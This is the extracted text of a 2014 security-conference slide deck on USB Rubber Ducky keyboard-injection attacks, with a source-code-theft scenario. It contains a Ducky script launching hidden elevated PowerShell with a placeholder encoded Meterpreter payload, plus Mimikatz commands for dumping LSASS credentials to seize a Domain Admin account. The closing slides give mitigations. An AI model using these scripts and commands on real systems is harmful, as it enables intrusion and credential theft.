10/02/201410/02/2014 Nimrod LevyInformation security consultant

Nimrod LevyInformation security consultant

Duck HunterDuck HunterThe return of autorunThe return of autorun

$ WHOAMI$ WHOAMI

• Information Security consultant at 2Bsecure@Matrix• Certified OSCP (Offensive Security Certified Professional)• Security tools personally developed:

AutoBrowser 3.0 Subdomain Analyzer PyWeakServices tool

• 1st Place at The Israel Cyber Challenge, 2014The Symantec™ Cyber Readiness Challenge was hosted during the CyberTech event

The missionThe mission

We are employees in the “Fakesoft” company and we are

very disappointed by the way the administration is

behaving.

We think that we can develop the software by ourselves

and make a fortune. We need to find a way to take over a

"Domain Admin" user account, through this account get

access to the backup server, and copy the source code of

the software.

ObstaclesObstacles

• Antivirus software is installed and running on end-user stations.

• No internet access.• Segmentation with a central firewall• Use of all removable storage is denied from the stations.

Programmable HID USB KeyboardProgrammable HID USB Keyboard

USB Rubber ducky:

USB rubber ducky is a smart device

which can emulate a keyboard or a

mouse when connected to a

computer and can execute a pre

programmed instructions.

Programmable HID USB KeyboardProgrammable HID USB Keyboard

Examples of attack vector scenarios:

• Add users to the system

• Deploy and run programs

• Upload local files

• Download and install apps

• Go to website that the victim has cookies for, and perform

a CSRF attack.

Attack processAttack process

60 seconds

Idea

Write

EncodeLoad

Deploy

Scenario codeScenario code

DELAY 3000

CONTROL ESCAPE

DELAY 400

STRING cmd

DELAY 400

MENU

DELAY 400

STRING a

DELAY 700

LEFTARROW

DELAY 400

ENTER

DELAY 800

ENTER

ENTER

STRING powershell -nop -wind hidden -noni –enc METERPRETER ENCRYPTED AND ENCODED PAYLOAD

ENTER

What do we need ?What do we need ?

Meterpreter payload stager:

Meterpreter is an advanced, dynamically extensible payload

that uses in-memory DLL injection stagers and is extended

over the network at runtime.

What do we need ?What do we need ?

Mimikatz:

Mimikatz is a post-exploitation tool written by Benjamin

Delpy (gentilkiwi).

The functionality of Mimikatz we can use is the dumped

sessions saved within LSASS and obtain clear-text

credentials of user accounts that connected to this machine.

Post-exploitation scenarioPost-exploitation scenario

Command Explanation

getsystem Attempt to elevate your privilege to local system.

load mimikatz Loading mimikatz extension

mimikatz_command -f

sekurlsa::logonPasswords full

Run a custom command.This module extracts passwords that saved on lsass memory

background Backgrounds the current session

ResultResult

Now we have taken control of a domain admin account that

is not linked directly to us. What can we do?

• Copy the source code we initially wanted.

• Delete or manipulate sensitive organizational data.

• Full control of user account management.

• Install malicious applications using the GPO.

MitigationMitigation

• Define a whitelist for authorized devices.

• Increase awareness for social engineering among the

employees.

QuestionsQuestions

Nimrod.Levy@2bsecure.co.il